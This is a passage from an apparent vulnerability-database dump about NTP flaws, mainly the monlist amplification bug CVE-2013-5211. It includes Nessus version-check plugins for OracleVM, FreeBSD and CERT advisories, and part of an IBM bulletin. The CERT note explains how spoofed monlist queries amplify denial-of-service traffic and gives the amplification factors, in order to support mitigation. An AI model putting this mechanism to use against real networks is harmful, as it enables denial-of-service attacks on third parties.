exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! 
preg(pattern:\"^OVS\" + \"(3\\.3|3\\.4)\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.3 / 3.4\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.3\", reference:\"ntp-4.2.6p5-10.0.1.el6_8.2\")) flag++;\nif (rpm_check(release:\"OVS3.3\", reference:\"ntpdate-4.2.6p5-10.0.1.el6_8.2\")) flag++;\n\nif (rpm_check(release:\"OVS3.4\", reference:\"ntp-4.2.6p5-10.0.1.el6_8.2\")) flag++;\nif (rpm_check(release:\"OVS3.4\", reference:\"ntpdate-4.2.6p5-10.0.1.el6_8.2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ntp / ntpdate\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:43:22", "description": "The remote OracleVM system is missing necessary patches to address critical security updates :\n\n - add disable monitor to default ntp.conf [CVE-2013-5211]\n\n - fix buffer overflow in parsing of address in ntpq and ntpdc (CVE-2018-12327)\n\n - fix CVE-2016-7429 patch to work correctly on multicast client (#1422973)\n\n - fix buffer overflow in datum refclock driver (CVE-2017-6462)\n\n - fix crash with invalid unpeer command (CVE-2017-6463)\n\n - fix potential crash with invalid server command (CVE-2017-6464)", "cvss3": {}, "published": "2018-12-21T00:00:00", "type": "nessus", "title": "OracleVM 3.3 / 3.4 : ntp (OVMSA-2018-0290)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211", "CVE-2016-7429", "CVE-2017-6462", 
"CVE-2017-6463", "CVE-2017-6464", "CVE-2018-12327"], "modified": "2020-03-27T00:00:00", "cpe": ["p-cpe:/a:oracle:vm:ntp", "p-cpe:/a:oracle:vm:ntpdate", "cpe:/o:oracle:vm_server:3.3", "cpe:/o:oracle:vm_server:3.4"], "id": "ORACLEVM_OVMSA-2018-0290.NASL", "href": "https://www.tenable.com/plugins/nessus/119823", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2018-0290.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(119823);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/27\");\n\n script_cve_id(\"CVE-2013-5211\", \"CVE-2016-7429\", \"CVE-2017-6462\", \"CVE-2017-6463\", \"CVE-2017-6464\", \"CVE-2018-12327\");\n script_bugtraq_id(64692);\n\n script_name(english:\"OracleVM 3.3 / 3.4 : ntp (OVMSA-2018-0290)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - add disable monitor to default ntp.conf [CVE-2013-5211]\n\n - fix buffer overflow in parsing of address in ntpq and\n ntpdc (CVE-2018-12327)\n\n - fix CVE-2016-7429 patch to work correctly on multicast\n client (#1422973)\n\n - fix buffer overflow in datum refclock driver\n (CVE-2017-6462)\n\n - fix crash with invalid unpeer command (CVE-2017-6463)\n\n - fix potential crash with invalid server command\n (CVE-2017-6464)\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2018-December/000925.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0a1122bd\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2018-December/000924.html\n script_set_attribute(\n 
attribute:\"see_also\",\n value:\"http://www.nessus.org/u?26f22544\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected ntp / ntpdate packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:ntpdate\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/01/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/12/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/12/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"(3\\.3|3\\.4)\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.3 / 3.4\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.3\", reference:\"ntp-4.2.6p5-15.0.1.el6_10\")) flag++;\nif (rpm_check(release:\"OVS3.3\", reference:\"ntpdate-4.2.6p5-15.0.1.el6_10\")) flag++;\n\nif (rpm_check(release:\"OVS3.4\", reference:\"ntp-4.2.6p5-15.0.1.el6_10\")) flag++;\nif (rpm_check(release:\"OVS3.4\", reference:\"ntpdate-4.2.6p5-15.0.1.el6_10\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ntp / ntpdate\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:44", "description": "The remote OracleVM system is missing necessary patches to address critical security updates :\n\n - add disable monitor to default ntp.conf [CVE-2013-5211]\n\n - fix buffer 
overflow in datum refclock driver (CVE-2017-6462)\n\n - fix crash with invalid unpeer command (CVE-2017-6463)\n\n - fix potential crash with invalid server command (CVE-2017-6464)\n\n - don't limit rate of packets from sources (CVE-2016-7426)\n\n - don't change interface from received packets (CVE-2016-7429)\n\n - fix calculation of root distance again (CVE-2016-7433)\n\n - require authentication for trap commands (CVE-2016-9310)\n\n - fix crash when reporting peer event to trappers (CVE-2016-9311)\n\n - don't allow spoofed packets to demobilize associations (CVE-2015-7979, CVE-2016-1547)\n\n - don't allow spoofed packet to enable symmetric interleaved mode (CVE-2016-1548)\n\n - check mode of new source in config command (CVE-2016-2518)\n\n - make MAC check resilient against timing attack (CVE-2016-1550)", "cvss3": {}, "published": "2017-10-27T00:00:00", "type": "nessus", "title": "OracleVM 3.3 / 3.4 : ntp (OVMSA-2017-0165)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211", "CVE-2015-7979", "CVE-2016-1547", "CVE-2016-1548", "CVE-2016-1550", "CVE-2016-2518", "CVE-2016-7426", "CVE-2016-7429", "CVE-2016-7433", "CVE-2016-9310", "CVE-2016-9311", "CVE-2017-6462", "CVE-2017-6463", "CVE-2017-6464"], "modified": "2021-01-04T00:00:00", "cpe": ["cpe:/o:oracle:vm_server:3.4", "p-cpe:/a:oracle:vm:ntp", "p-cpe:/a:oracle:vm:ntpdate", "cpe:/o:oracle:vm_server:3.3"], "id": "ORACLEVM_OVMSA-2017-0165.NASL", "href": "https://www.tenable.com/plugins/nessus/104204", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2017-0165.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(104204);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2013-5211\", \"CVE-2015-7979\", \"CVE-2016-1547\", \"CVE-2016-1548\", 
\"CVE-2016-1550\", \"CVE-2016-2518\", \"CVE-2016-7426\", \"CVE-2016-7429\", \"CVE-2016-7433\", \"CVE-2016-9310\", \"CVE-2016-9311\", \"CVE-2017-6462\", \"CVE-2017-6463\", \"CVE-2017-6464\");\n script_bugtraq_id(64692);\n\n script_name(english:\"OracleVM 3.3 / 3.4 : ntp (OVMSA-2017-0165)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - add disable monitor to default ntp.conf [CVE-2013-5211]\n\n - fix buffer overflow in datum refclock driver\n (CVE-2017-6462)\n\n - fix crash with invalid unpeer command (CVE-2017-6463)\n\n - fix potential crash with invalid server command\n (CVE-2017-6464)\n\n - don't limit rate of packets from sources (CVE-2016-7426)\n\n - don't change interface from received packets\n (CVE-2016-7429)\n\n - fix calculation of root distance again (CVE-2016-7433)\n\n - require authentication for trap commands (CVE-2016-9310)\n\n - fix crash when reporting peer event to trappers\n (CVE-2016-9311)\n\n - don't allow spoofed packets to demobilize associations\n (CVE-2015-7979, CVE-2016-1547)\n\n - don't allow spoofed packet to enable symmetric\n interleaved mode (CVE-2016-1548)\n\n - check mode of new source in config command\n (CVE-2016-2518)\n\n - make MAC check resilient against timing attack\n (CVE-2016-1550)\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2017-October/000795.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7c1983e3\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2017-October/000796.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9454d3fb\"\n );\n script_set_attribute(\n attribute:\"solution\", \n 
value:\"Update the affected ntp / ntpdate packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:ntpdate\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/01/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! 
preg(pattern:\"^OVS\" + \"(3\\.3|3\\.4)\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.3 / 3.4\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.3\", reference:\"ntp-4.2.6p5-12.0.1.el6_9.1\")) flag++;\nif (rpm_check(release:\"OVS3.3\", reference:\"ntpdate-4.2.6p5-12.0.1.el6_9.1\")) flag++;\n\nif (rpm_check(release:\"OVS3.4\", reference:\"ntp-4.2.6p5-12.0.1.el6_9.1\")) flag++;\nif (rpm_check(release:\"OVS3.4\", reference:\"ntpdate-4.2.6p5-12.0.1.el6_9.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ntp / ntpdate\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "checkpoint_advisories": [{"lastseen": "2022-11-28T06:51:15", "description": "There exists a design flaw in NTP servers that can allow attackers to perform DoS attacks against target machines. 
A remote attacker can leverage this flaw by sending a specially crafted request to an affected NTP server.", "cvss3": {}, "published": "2014-01-19T00:00:00", "type": "checkpoint_advisories", "title": "NTP Servers Monlist Command Denial of Service (CVE-2013-5211)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2022-11-27T00:00:00", "id": "CPAI-2014-0750", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "freebsd": [{"lastseen": "2023-09-12T17:06:05", "description": "\n\nntp.org reports:\n\nUnrestricted access to the monlist feature in\n\t ntp_request.c in ntpd in NTP before 4.2.7p26 allows remote\n\t attackers to cause a denial of service (traffic\n\t amplification) via forged (1) REQ_MON_GETLIST or (2)\n\t REQ_MON_GETLIST_1 requests, as exploited in the wild in\n\t December 2013\nUse noquery to your default restrictions to block all\n\t status queries.\nUse disable monitor to disable the ``ntpdc -c monlist''\n\t command while still allowing other status queries.\n\n\n", "cvss3": {}, "published": "2014-01-01T00:00:00", "type": "freebsd", "title": "ntpd DRDoS / Amplification Attack using ntpdc monlist command", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5211"], "modified": "2016-08-09T00:00:00", "id": "3D95C9A7-7D5C-11E3-A8C1-206A8A720317", "href": "https://vuxml.freebsd.org/freebsd/3d95c9a7-7d5c-11e3-a8c1-206a8a720317.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "cert": [{"lastseen": "2023-05-29T15:28:51", "description": "### 
Overview\n\nUDP protocols such as NTP can be abused to amplify denial-of-service attack traffic. Servers running the network time protocol (NTP) based on implementations of ntpd prior to version 4.2.7p26 that use the default unrestricted query configuration are susceptible to a reflected denial-of-service (DRDoS) attack. Other proprietary NTP implementations may also be affected.\n\n### Description\n\nNTP and other UDP-based protocols can be used to amplify denial-of-service attacks. Servers running the network time protocol (NTP) based on implementations of ntpd prior to version 4.2.7p26 that use the default unrestricted query configuration are susceptible to a reflected denial-of-service (DRDoS) attack. Other proprietary NTP implementations may also be affected. This is similar in scope to [DNS Amplification Attacks](<http://www.us-cert.gov/ncas/alerts/TA13-088A>).\n\nIn a reflected denial-of-service attack, the attacker spoofs the source address of attack traffic, replacing the source address with the target's address. Certain NTP control messages provide significant bandwidth amplification factors (BAF). \n \nNTP is designed for time synchronization, and may also implement other features such as server administration, maintenance, and monitoring. NTP relies on the user datagram protocol (UDP) to send and receive messages, which does not validate the source (IP address) of the sender. The NTP DRDoS attack is similar to the reflective DoS attacks used on open DNS resolvers. The attacker sends a packet with their source address being the IP of a victim. The NTP server replies to this request, but the number of bytes sent in the response is an amplified amount compared to the initial request, resulting in a denial-of-service on the victim. The two highest message types, `REQ_MON_GETLIST` and `REQ_MON_GETLIST_1` amplify the original request by a factor of up to 3660 and 5500 respectively. 
This bandwidth amplification factor (BAF) is a bandwidth multiplier based on the number of UDP payload bytes that are sent by the server in comparison to the UDP payload bytes of the request. Other message types can also be used in this attack, but `REQ_MON_GETLIST` and `REQ_MON_GETLIST_1` create the biggest impact. \n \nThis vulnerability contains elements of [CWE-406](<http://cwe.mitre.org/data/definitions/406.html>): Insufficient Control of Network Message Volume (Network Amplification). \n \nMore information can be found in Christian Rossow's \"[Amplification DDoS Attacks (Ab)using NTP Servers](<http://christian-rossow.de/articles/Amplification_DDoS.php>)\" blog post. \n \nIn April 2014, Rapid7 published [R7-2014-12](<https://community.rapid7.com/community/metasploit/blog/2014/08/25/r7-2014-12-more-amplification-vulnerabilities-in-ntp-allow-even-more-drdos-attacks>) documenting additional NTP commands that can amplify traffic and disclose potentially sensitive information. \n \n--- \n \n### Impact\n\nAn unauthenticated remote attacker may leverage the vulnerable NTP server to conduct a distributed reflective denial-of-service (DRDoS) attack on another user. \n \n--- \n \n### Solution\n\n**Apply an Update** \nAffected users are advised to update to [ntpd versions 4.2.7p26 and greater](<http://www.ntp.org/downloads.html>). \n \nntpd version 4.2.7p26 disables `REQ_MON_GETLIST` and `REQ_MON_GETLIST_1`, removing the two most significant BAF control messages. \n \nThe 4.2.6.x and earlier production branches are still vulnerable to this attack, however. \n \nIf an update is not possible, please consider one or more of the following workarounds. 
\n \n--- \n \n**Check if the amplified responses are enabled** \nEntering the following commands can help users verify if the `REQ_MON_GETLIST` and `REQ_MON_GETLIST_1` responses of NTP are currently enabled: \n \n`ntpq -c rv` \n`ntpdc -c sysinfo` \n`ntpdc -n -c monlist` \n \nThese commands only verify if the specified functions are enabled. If they are enabled, implement at least one of the following: \n \n**Perform Egress Filtering** \nConfigure your router/firewall to perform egress filtering, which may help to mitigate attacks that utilize source IP spoofing. Please refer to your product's documentation for instructions on how to perform egress filtering. \n \n**Disable status queries or restrict access.** \nThe ntpd status query features provided by ntpq/ntpdc will reveal some information about the system running ntpd (e.g. OS version, ntpd version) that you may not wish others to know. Disabling this feature may also help to reduce the likelihood of this vulnerability taking place. If the NTP implementation is vulnerable, adding the following lines to your `ntp.conf` file will restrict informational queries to authorized recipients only. \n \nIPV4: `restrict default kod nomodify notrap nopeer noquery` \nIPv6: `restrict -6 default kod nomodify notrap nopeer noquery` \nPlease note that a restart of the ntpd service is required for changes to take effect. \n \nIt is also possible to restrict access per network segment (be sure to modify line 3 to match your LAN settings) and per host (line 4): \n \n`restrict default noquery` \n`restrict localhost` \n`restrict 192.168.0.0 netmask 255.255.0.0` \n`restrict 192.168.1.27` \nPlease note that a restart of the ntpd service is required for changes to take effect. Please also note that the ntpq/ntpdc query capabilities provide useful Q/A and debugging information. Disabling these queries comes with a cost. 
\n \n--- \n \n### Vendor Information\n\n348126\n\n### Cisco Systems, Inc. Affected\n\nNotified: September 17, 2013 Updated: September 17, 2013 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Hewlett-Packard Company Affected\n\nUpdated: January 14, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nA potential security vulnerability has been identified with HP-UX running NTP. The vulnerability could be exploited remotely to create a Denial of Service (DoS).\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04084148>\n\n### Meinberg Funkuhren GmbH & Co. 
KG Affected\n\nNotified: October 07, 2013 Updated: January 14, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nVendor is advising affected users to refer to [Meinberg Security Advisory MBGSA-1401](<http://www.meinbergglobal.com/english/news/meinberg-security-advisory-mbgsa-1401-ntp-monlist-network-traffic-amplification-attacks.htm>) for additional information.\n\n### Vendor References\n\n * <http://www.meinbergglobal.com/english/news/meinberg-security-advisory-mbgsa-1401-ntp-monlist-network-traffic-amplification-attacks.htm>\n\n### NEC Corporation Affected\n\nUpdated: March 26, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe provide information on this issue at the following URL <http://jpn.nec.com/security-info/secinfo/nv14-001.html> (only in Japanese)\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://jpn.nec.com/security-info/secinfo/nv14-001.html>\n\n### Network Time Protocol Affected\n\nNotified: September 16, 2013 Updated: September 17, 2013 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Juniper Networks, Inc. 
Unknown\n\nNotified: October 07, 2013 Updated: October 07, 2013 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n \n\n\n### CVSS Metrics\n\nGroup | Score | Vector \n---|---|--- \nBase | 7.8 | AV:N/AC:L/Au:N/C:N/I:N/A:C \nTemporal | 6.1 | E:POC/RL:OF/RC:C \nEnvironmental | 4.6 | CDP:ND/TD:M/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References\n\n * <http://bugs.ntp.org/show_bug.cgi?id=1532>\n * <http://cwe.mitre.org/data/definitions/406.html>\n * <http://www.nwtime.org/>\n * <http://ntp.org>\n * <http://www.cisco.com/en/US/products/ps9494/Products_Sub_Category_Home.html>\n * <http://www.us-cert.gov/ncas/alerts/TA13-088A>\n * <http://www.prolexic.com/knowledge-center-white-paper-series-snmp-ntp-chargen-reflection-attacks-drdos-ddos.html>\n * <http://www.meinbergglobal.com/english/news/meinberg-security-advisory-mbgsa-1401-ntp-monlist-network-traffic-amplification-attacks.htm>\n * <http://christian-rossow.de/articles/Amplification_DDoS.php>\n * <https://community.rapid7.com/community/metasploit/blog/2014/08/25/r7-2014-12-more-amplification-vulnerabilities-in-ntp-allow-even-more-drdos-attacks>\n\n### Acknowledgements\n\nThanks to Christian Rossow for reporting this vulnerability.\n\nThis document was written by Michael Orlando.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2013-5211](<http://web.nvd.nist.gov/vuln/detail/CVE-2013-5211>) \n---|--- \n**Date Public:** | 2014-01-02 \n**Date First Published:** | 2014-01-10 \n**Date Last Updated: ** | 2014-08-26 15:00 UTC \n**Document Revision: ** | 83 \n", "cvss3": {}, "published": "2014-01-10T00:00:00", "type": "cert", "title": "NTP can be abused to amplify denial-of-service attack traffic", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", 
"availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5211"], "modified": "2014-08-26T15:00:00", "id": "VU:348126", "href": "https://www.kb.cert.org/vuls/id/348126", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "ibm": [{"lastseen": "2023-02-23T21:53:04", "description": "## Summary\n\nIBM Flex System Manager (FSM) is affected by a ntp vulnerability that could result in a denial of service\n\n## Vulnerability Details\n\n## Abstract\n\nIBM Flex System Manager (FSM) is affected by a ntp vulnerability that could result in a denial of service\n\n## Content\n\n**Vulnerability Details:**\n\n**CVE-ID:** [CVE-2013-5211](<https://vulners.com/cve/CVE-2013-5211>) \n \n**Description:** IBM Flex System Manager allows a remote attacker to use a valid NTP server to cause a potential denial of service attack by forging ntp requests. 
\nCVSS Base Score: 5.0 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/90143> \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\n \n\n\n## Affected products and versions\n\nFrom the FSM command line enter **lsconfig -V** to determine the level of FSM installed.\n\n * Flex System Manager 1.1.x.x\n * Flex System Manager 1.2.0.x\n * Flex System Manager 1.2.1.x\n * Flex System Manager 1.3.0.x\n * Flex System Manager 1.3.1.x\n\n**NON-AFFECTED PRODUCTS and VERSIONS**\n\nFlex System Manager 1.3.2.x\n\n## Remediation:\n\nProduct | VRMF | APAR | Remediation \n---|---|---|--- \nFlex System Manager | 1.1.x.x | IT00278 | Upgrade to FSM 1.3.2.0, or open a PMR with support to request an APAR \nFlex System Manager | 1.2.0.x | IT00278 | [ fsmfix1.2.0.0_IT00252](<http://www.ibm.com/support/fixcentral/systemx/quickorder?parent=Flex+System+Manager+Node&product=ibm/systemx/8731&&platform=All&function=fixId&fixids=fsmfix1.2.0.0_IT00252&includeRequisites=1&includeSupersedes=0&downloadMethod=ddp&source=fc>) \nFlex System Manager | 1.2.1.x | IT00278 | [ fsmfix1.2.1.0_IT00252](<http://www.ibm.com/support/fixcentral/systemx/quickorder?parent=Flex+System+Manager+Node&product=ibm/systemx/8731&&platform=All&function=fixId&fixids=fsmfix1.2.1.0_IT00252&includeRequisites=1&includeSupersedes=0&downloadMethod=ddp&source=fc>) \nFlex System Manager | 1.3.0.x | IT00278 | [ fsmfix1.3.0.0_IT00252](<http://www.ibm.com/support/fixcentral/systemx/quickorder?parent=Flex+System+Manager+Node&product=ibm/systemx/8731&&platform=All&function=fixId&fixids=fsmfix1.3.0.0_IT00252&includeRequisites=1&includeSupersedes=0&downloadMethod=ddp&source=fc>) \nFlex System Manager | 1.3.1.x | IT00278 | [ fsmfix1.3.1.0_IT00252](<http://www.ibm.com/support/fixcentral/systemx/quickorder?parent=Flex+System+Manager+Node&product=ibm/systemx/8731&&platform=All&function=fixId&fixids=fsmfix1.3.1.0_IT00252&includeRequisites=1&includeSupersedes=0&downloadMethod=ddp&source=fc>) \n \n## 
